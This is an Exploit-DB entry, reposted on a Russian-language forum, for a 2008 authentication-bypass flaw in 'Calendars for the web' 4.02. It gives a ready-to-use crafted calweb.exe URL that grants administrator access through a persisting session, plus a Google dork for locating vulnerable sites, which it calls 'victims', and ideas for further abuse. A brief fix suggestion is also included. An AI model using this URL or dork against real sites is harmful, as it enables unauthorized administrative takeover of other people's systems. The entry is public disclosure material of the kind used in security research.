- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6771
- Проверка EDB
-
- Пройдено
- Автор
- SECVULN
- Тип уязвимости
- WEBAPPS
- Платформа
- CGI
- CVE
- N/A
- Дата публикации
- 2008-10-16
Код:
*******************************************************
*Exploit discovered by SecVuln from http://secvuln.com*
*Come join our clan! *
*contact [email protected] *
*******************************************************
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Author == SecVuln
Version == 4.02
Software == Calendars for the web by great hill corporation
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Calendars for the web has a vulnerability in the administration page.
The page saves the past session, so that anyone navigating to the page has
admin access.
Exploit:
Before attack: target.com/calendarWeb/cgi-bin/calweb/calweb.exe
After attack:
target.com/calendarWeb/cgi-bin/calweb/calweb.exe?cal=default&vt=6&cmd=900&act=0&dd=2008;10;03;12;00;00;&app=0&format=21x05i9r9s|SnriTmOdoaT&lastcmd=0
Example:
target.com/calendarWeb/cgi-bin/calweb/calweb.exe?cal=default&vt=6&cmd=900&act=0&dd=2008;10;03;12;00;00;&app=0&format=21x05i9r9s|SnriTmOdoaT&lastcmd=0
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
how to fix: set time out for login to five minutes !
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
A Google query can find a couple pages of victims: inurl:calweb/calweb.exe
Further hacks: if they disable the timeout you can still log in right after
they log out... You could probaly do something with that
Also the 0 at the ending is the administrator (super user) id.
/////////////////////////////////////////////////////////////////
I take no responsability for the misuse of the information.//////
Author will not be held liable for any damages //////
COME CHECK MY SITE OUT WWW.SECVULN.COM //////
////////////////////////////////////////////////////////////////
# milw0rm.com [2008-10-16]- Источник
- www.exploit-db.com
